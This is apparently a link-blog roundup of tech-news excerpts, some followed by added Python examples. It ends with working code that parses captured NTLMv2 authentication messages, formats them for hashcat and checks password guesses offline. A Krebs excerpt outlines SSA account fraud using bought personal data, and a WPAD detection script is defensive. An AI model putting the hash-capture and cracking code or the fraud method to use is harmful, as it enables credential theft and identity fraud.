The tactics Microsoft employed to get users of earlier versions of Windows to upgrade to Windows 10 went from annoying to downright malicious. Some highlights: Microsoft installed an app in users’ system trays advertising the free upgrade to Windows 10. The app couldn’t be easily hidden or removed, but some enterprising users figured out a way. Then, the company kept changing the app and bundling it into various security patches, creating a cat-and-mouse game to uninstall it.
Source: With Windows 10, Microsoft Blatantly Disregards User Choice and Privacy: A Deep Dive | Electronic Frontier Foundation
And while users can disable some of these settings, it is not a guarantee that your computer will stop talking to Microsoft’s servers. A significant issue is the telemetry data the company receives. While Microsoft insists that it aggregates and anonymizes this data, it hasn’t explained just how it does so.
The Ixion Team is a new addition to NASA’s NextSTEP effort, and will begin by conducting a comprehensive feasibility study evaluating the conversion of rocket upper stages into habitats. This innovative approach offers a pathway that is more affordable and involves less risk than fabricating modules on the ground and subsequently launching them into orbit.
Source: NanoRacks To Catalyze Concepts for Deep Space Habitats
GE and Deepwater Wind, a developer of offshore turbines, are installing five massive wind turbines in the middle of the Atlantic Ocean. They will make up the first offshore wind farm in North America, called the Block Island Wind Farm.
Over the past several weeks, the teams have worked to install the turbines 30 miles off the coast of Rhode Island, and are expected to finish by the end of August 2016. The farm will be fully operational by November 2016.
Source: GE is building America’s first offshore wind farm with turbines twice as tall as the Statue of Liberty
Sadly, it is still relatively easy for thieves to create an account in the name of Americans who have not already created one for themselves. All one would need is the target’s name, date of birth, Social Security number, residential address, and phone number. This personal data can be bought for roughly $3-$4 from a variety of cybercrime shops online.
After that, the SSA relays four multiple-guess, so-called “knowledge-based authentication” or KBA questions from credit bureau Equifax. In practice, many of these KBA questions — such as previous address, loan amounts and dates — can be successfully enumerated with random guessing. What’s more, very often the answers to these questions can be found by consulting free online services, such as Zillow and Facebook.
Source: Social Security Administration Now Requires Two-Factor Authentication — Krebs on Security
The location of PAC files can be discovered through WPAD in several ways: through a special Dynamic Host Configuration Protocol (DHCP) option, through local Domain Name System (DNS) lookups, or through Link-Local Multicast Name Resolution (LLMNR).
Source: Disable WPAD now or have your accounts and private data compromised | CSO Online
The researchers recommended computer users disable the protocol. “No seriously, turn off WPAD!” one of their presentation slides said. “If you still need to use PAC files, turn off WPAD and configure an explicit URL for your PAC script; and serve it over HTTPS or from a local file.”
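The discovery channels in the excerpt above, and the explicit-PAC-URL alternative the researchers recommend, as an added example (not code from the CSO Online article or from the DEF CON presenters). It parses DHCP option 252 out of a constructed DHCP ACK, lists the names a client derives from its own DNS suffix when it goes looking for "wpad", flags wpad answers in constructed DNS log lines that point outside the RFC 1918 ranges, and checks a configured PAC URL against the https-or-local-file advice. Hostnames, addresses, the log format and the devolution stop rule are constructed or simplified, as marked in the comments.

```python
"""WPAD discovery audit helpers (added example; all inputs below are constructed)."""
import ipaddress
from urllib.parse import urlparse

DHCP_MAGIC = b"\x63\x82\x53\x63"                      # RFC 2132 magic cookie
OPT_PAD, OPT_END, OPT_MSG_TYPE, OPT_WPAD = 0, 255, 53, 252
LAN_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_dhcp_options(options: bytes) -> dict:
    """Parse the DHCP options field (cookie followed by code/len/value TLVs)."""
    if not options.startswith(DHCP_MAGIC):
        raise ValueError("missing DHCP magic cookie")
    opts, i = {}, len(DHCP_MAGIC)
    while i < len(options):
        code = options[i]
        if code == OPT_PAD:
            i += 1
            continue
        if code == OPT_END:
            break
        length = options[i + 1]
        opts[code] = options[i + 2:i + 2 + length]
        i += 2 + length
    return opts


def wpad_url_from_dhcp(options: bytes):
    """PAC URL pushed via option 252, or None. Trailing NUL/whitespace is stripped
    the way clients do, since some servers NUL-terminate the string."""
    raw = parse_dhcp_options(options).get(OPT_WPAD)
    return None if raw is None else raw.rstrip(b"\x00 \r\n").decode("ascii", "replace")


def wpad_dns_candidates(fqdn: str, min_labels: int = 2) -> list:
    """Names a client queries while walking up its own DNS suffix ("devolution").
    Assumption: the walk stops once min_labels labels remain; the real stop rule
    depends on the OS and its devolution settings. Whichever name resolves first
    hands the browser http://<name>/wpad.dat."""
    labels = fqdn.lower().strip(".").split(".")[1:]   # drop the host's own label
    names = []
    while len(labels) >= min_labels:
        names.append("wpad." + ".".join(labels))
        labels = labels[1:]
    return names


def is_lan(ip: str) -> bool:
    """RFC 1918 only; extend LAN_NETS for your own address plan."""
    return any(ipaddress.ip_address(ip) in net for net in LAN_NETS)


def suspicious_wpad_answers(log_lines) -> list:
    """Detection: wpad lookups answered with an address outside the LAN.
    Log format is constructed: "<client> <qname> <answer>" per line."""
    hits = []
    for line in log_lines:
        client, qname, answer = line.split()
        if qname.lower().startswith("wpad.") and not is_lan(answer):
            hits.append((client, qname, answer))
    return hits


def pac_url_is_acceptable(url: str) -> bool:
    """The researchers' alternative: an explicit PAC URL over HTTPS or a local file."""
    p = urlparse(url)
    return p.scheme in ("https", "file") and bool(p.netloc or p.path)


# Constructed DHCP ACK options: message type ACK, then option 252 with a NUL-terminated URL.
PAC_URL = b"http://10.0.0.9/wpad.dat\x00"
SAMPLE_DHCP_OPTIONS = (DHCP_MAGIC + bytes([OPT_MSG_TYPE, 1, 5])
                       + bytes([OPT_WPAD, len(PAC_URL)]) + PAC_URL + bytes([OPT_END]))

# Constructed DNS log lines.
SAMPLE_DNS_LOG = [
    "10.0.0.23 wpad.corp.example.com 10.0.0.9",
    "10.0.0.23 wpad.example.com 203.0.113.50",
    "10.0.0.42 www.example.com 203.0.113.10",
]

if __name__ == "__main__":
    print("DHCP option 252 ->", wpad_url_from_dhcp(SAMPLE_DHCP_OPTIONS))
    print("DNS candidates  ->", wpad_dns_candidates("laptop42.eng.corp.example.com"))
    print("Suspicious      ->", suspicious_wpad_answers(SAMPLE_DNS_LOG))
    for url in ("http://wpad/wpad.dat", "https://proxy.corp.example.com/proxy.pac"):
        print(url, "->", "acceptable" if pac_url_is_acceptable(url) else "rejected")
```

The DNS candidate list is the practical point: a laptop that joins any network whose resolver answers for one of those names, or whose DHCP server sets option 252, will fetch and execute a PAC script from it unless auto-detection is off.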
From Slashdot comments:
To prevent Windows from tracking which networks support WPAD, you need to make a simple registry change:
Click the Start button, and in the search field, type in “regedit”, then select “regedit.exe” from the list of results
Navigate through the tree to “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad”
Once you have the “Wpad” folder selected, right click in the right pane, and click on “New -> DWORD (32-Bit Value)”
Name this new value “WpadOverride”
Double click the new “WpadOverride” value to edit it
In the “Value data” field, replace the “0” with a “1”, then click “OK”
Reboot the computer
While Rightscorp was expected to make the most of BMG’s victory in its future dealings with ISPs, the level of aggression in its announcement still comes as a surprise. Essentially putting every provider in the country on notice, Rightscorp warns that ISPs will now have to cooperate or face the wrath of litigious rightsholders.
Source: Rightscorp Threatens Every ISP in the United States – TorrentFreak
Whether this week’s developments will help to pull Rightscorp out of the financial doldrums will remain to be seen. The company has been teetering on the edge of bankruptcy for a couple of years now, and its shares on Wednesday were worth just $0.038 each. Following the BMG news, they peaked at $0.044.
“5G” is a marketing term. There is no 5G standard — yet. The International Telecommunications Union plans to have standards ready by 2020. So for the moment “5G” refers to a handful of different kinds of technologies that are predicted, but not guaranteed, to emerge at some point in the next 3 to 7 years. (3GPP, a carrier consortium that will be contributing to the ITU process, said last year that until an actual standard exists, “’5G’ will remain a marketing & industry term that companies will use as they
Source: The Next Generation of Wireless — “5G” — Is All Hype. — Backchannel
An image kernel is a small matrix used to apply effects like the ones you might find in Photoshop or Gimp, such as blurring, sharpening, outlining or embossing. They’re also used in machine learning for ‘feature extraction’, a technique for determining the most important portions of an image. In this context the process is referred to more generally as “convolution” (see: convolutional neural networks.)
Source: Image Kernels explained visually
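The sliding dot product the excerpt describes, written out in plain Python as an added example (not code from the linked page). It includes the kernels the excerpt names (blur, sharpen, outline) plus a Sobel kernel to show that true convolution flips the kernel first, which only changes the result for asymmetric kernels; the sample images are constructed.

```python
"""2-D image-kernel convolution on plain lists (added example; sample images constructed)."""


def convolve2d(image, kernel, edge="clamp"):
    """Apply a square kernel to a 2-D list of pixel values.

    True convolution flips the kernel before the sliding dot product; for the
    symmetric kernels below it makes no difference, but for Sobel it flips the sign.
    Edge handling: "clamp" replicates the border pixel, "zero" reads 0 outside."""
    h, w = len(image), len(image[0])
    k = len(kernel)
    r = k // 2
    flipped = [row[::-1] for row in kernel[::-1]]
    out = [[0.0] * w for _ in range(h)]
    for y in range(h):
        for x in range(w):
            acc = 0.0
            for ky in range(k):
                for kx in range(k):
                    sy, sx = y + ky - r, x + kx - r
                    if 0 <= sy < h and 0 <= sx < w:
                        v = image[sy][sx]
                    elif edge == "clamp":
                        v = image[min(max(sy, 0), h - 1)][min(max(sx, 0), w - 1)]
                    else:
                        v = 0
                    acc += v * flipped[ky][kx]
            out[y][x] = acc
    return out


IDENTITY = [[0, 0, 0], [0, 1, 0], [0, 0, 0]]
BOX_BLUR = [[1 / 9] * 3 for _ in range(3)]            # weights sum to 1: brightness preserved
SHARPEN = [[0, -1, 0], [-1, 5, -1], [0, -1, 0]]        # sums to 1: flat regions unchanged
OUTLINE = [[-1, -1, -1], [-1, 8, -1], [-1, -1, -1]]    # sums to 0: flat regions go to 0
SOBEL_X = [[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]]         # asymmetric: responds to horizontal change

# Constructed images.
SPOT = [[0, 0, 0], [0, 9, 0], [0, 0, 0]]               # one bright pixel
FLAT = [[7] * 3 for _ in range(3)]                     # constant region
STEP = [[0, 0, 1, 1] for _ in range(3)]                # vertical edge between columns 1 and 2

if __name__ == "__main__":
    for name, kern in (("box blur", BOX_BLUR), ("sharpen", SHARPEN), ("outline", OUTLINE)):
        print(name, "on SPOT:", convolve2d(SPOT, kern))
    print("sobel-x on STEP:", convolve2d(STEP, SOBEL_X))
```

The "feature extraction" remark in the excerpt is visible in the last line of output: the Sobel response is zero on flat columns and non-zero only at the edge, which is the kind of localized signal a convolutional layer learns to pick out.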
Twelve out of 16 Bluetooth smart locks examined could be unlocked by a remote attacker, a researcher said at the DEF CON hacker conference.
Source: 75 Percent of Bluetooth Smart Locks Can Be Hacked
The problems didn’t lie with the Bluetooth Low Energy protocol itself, Rose said, but in the way the locks implemented Bluetooth communications, or with a lock’s companion smartphone app. Four locks, for example, transmitted their user passwords in plaintext to smartphones, making it easy for anyone with a $100 Bluetooth sniffer to pluck the passwords out of thin air.
Basically, the default User Authentication Settings of Edge/Spartan (also Internet Explorer, Outlook) let the browser connect to local network shares, but erroneously fail to block connections to remote shares. To exploit this, an attacker would simply set up a network share. An embedded image link that points to that network share is then sent to the victim, for example as part of an email or website. As soon as the prepped content is viewed inside a Microsoft product such as Edge/Spartan, Internet Explorer or Outlook, that software will try to connect to that share in order to download the image. Doing so, it will silently send the user’s Windows login username in plaintext along with the NTLMv2 hash of the login password to the attacker’s network share.
Source: Microsoft Live Account Credentials Leaking From Windows 8 And Above | Hackaday
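What the attacker's share actually receives in the scenario above, as an added example (not code from the Hackaday article): the client's NTLMSSP AUTHENTICATE message, which carries the user name and domain in clear and an NTLMv2 response to a challenge the attacker's server chose. The block builds such a message from constructed values in the MS-NLMP 2.2.1.3 layout, parses it the way a capturing server would, emits the user::domain:challenge:proof:blob line that offline crackers consume, and shows that this line alone is enough to test password guesses. The user, domain, workstation, password, challenge, blob contents and Windows version bytes are all constructed; MD4 is implemented inline because hashlib often lacks it under OpenSSL 3.

```python
"""NTLMSSP AUTHENTICATE capture and offline guess check (added example; constructed values)."""
import hashlib
import hmac
import struct

NTLMSSP = b"NTLMSSP\x00"
AUTHENTICATE = 3
NEGOTIATE_UNICODE = 0x00000001
MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); the NT hash is MD4 over the UTF-16LE password."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (F, 0, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        saved = (a, b, c, d)
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rol((a + fn(b, c, d) + X[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c          # rotate roles: next op updates the old d
        a, b, c, d = [(x + y) & MASK for x, y in zip((a, b, c, d), saved)]
    return struct.pack("<4I", a, b, c, d)


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(MD4(UTF16(password)), UTF16(upper(user) + domain))."""
    return hmac.new(md4(password.encode("utf-16-le")),
                    (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(password, user, domain, server_challenge: bytes, blob: bytes) -> bytes:
    """NtChallengeResponse = NTProofStr(16) || blob (MS-NLMP 3.3.2)."""
    proof = hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def build_authenticate(user, domain, workstation, nt_response, lm_response=b"\x00" * 24):
    """Serialize an AUTHENTICATE message; field offsets count from the message start."""
    header_len = 8 + 4 + 6 * 8 + 4 + 8 + 16     # signature, type, 6 descriptors, flags, version, MIC
    payload = bytearray()

    def add(data: bytes) -> bytes:
        desc = struct.pack("<HHI", len(data), len(data), header_len + len(payload))
        payload.extend(data)
        return desc

    u16 = lambda s: s.encode("utf-16-le")
    fields = b"".join(add(x) for x in (lm_response, nt_response, u16(domain), u16(user), u16(workstation), b""))
    version = bytes([10, 0]) + struct.pack("<H", 19041) + b"\x00\x00\x00\x0f"   # constructed version field
    return (NTLMSSP + struct.pack("<I", AUTHENTICATE) + fields
            + struct.pack("<I", NEGOTIATE_UNICODE) + version + b"\x00" * 16 + bytes(payload))


def parse_authenticate(msg: bytes) -> dict:
    """What the capturing server sees: user, domain and workstation in clear, plus the response."""
    if msg[:8] != NTLMSSP or struct.unpack_from("<I", msg, 8)[0] != AUTHENTICATE:
        raise ValueError("not an NTLMSSP AUTHENTICATE message")
    out, pos = {}, 12
    for name in ("lm_response", "nt_response", "domain", "user", "workstation", "session_key"):
        length, _maxlen, off = struct.unpack_from("<HHI", msg, pos)
        out[name] = msg[off:off + length]
        pos += 8
    flags = struct.unpack_from("<I", msg, pos)[0]
    codec = "utf-16-le" if flags & NEGOTIATE_UNICODE else "cp437"   # cp437 is an assumed OEM code page
    for name in ("domain", "user", "workstation"):
        out[name] = out[name].decode(codec)
    return out


def to_hashcat_5600(parsed: dict, server_challenge: bytes) -> str:
    """NetNTLMv2 line as crackers take it: user::domain:serverchallenge:NTProofStr:blob."""
    nt = parsed["nt_response"]
    if len(nt) <= 24:
        raise ValueError("LM/NTLMv1-sized response, not NTLMv2")
    return "%s::%s:%s:%s:%s" % (parsed["user"], parsed["domain"],
                                server_challenge.hex(), nt[:16].hex(), nt[16:].hex())


def check_password_guess(line: str, guess: str) -> bool:
    """Offline test of one guess against a captured line; no contact with the victim needed."""
    user, _, domain, chal, proof, blob = line.split(":")
    got = hmac.new(ntowf_v2(guess, user, domain), bytes.fromhex(chal) + bytes.fromhex(blob), hashlib.md5).hexdigest()
    return hmac.compare_digest(got, proof)


# Constructed values: the challenge is picked by the attacker's share; the blob is the
# client's NTLMv2_CLIENT_CHALLENGE with a timestamp, client nonce and one AvPair.
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
CLIENT_BLOB = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", 0x01D1D9B0A0E1F2C3)
               + bytes.fromhex("AABBCCDDEEFF0011") + b"\x00" * 4
               + struct.pack("<HH", 2, 8) + "CORP".encode("utf-16-le")
               + struct.pack("<HH", 0, 0) + b"\x00" * 4)
PASSWORD = "Winter2016!"


def demo():
    nt = ntlmv2_response(PASSWORD, "alice", "CORP", SERVER_CHALLENGE, CLIENT_BLOB)
    parsed = parse_authenticate(build_authenticate("alice", "CORP", "ALICE-PC", nt))
    return parsed, to_hashcat_5600(parsed, SERVER_CHALLENGE)


if __name__ == "__main__":
    parsed, line = demo()
    print("leaked identity:", parsed["domain"] + "\\" + parsed["user"], "from", parsed["workstation"])
    print("cracker input:", line)
    print("guess 'Summer2016!':", check_password_guess(line, "Summer2016!"))
    print("guess %r: %s" % (PASSWORD, check_password_guess(line, PASSWORD)))
```

The point the excerpt makes in words is visible in `check_password_guess`: once the share has the line, every guess costs one MD4 plus two HMAC-MD5 computations and never touches the victim, and the same line can also be relayed to another service that accepts NTLM while the attacker's server is still holding the connection open.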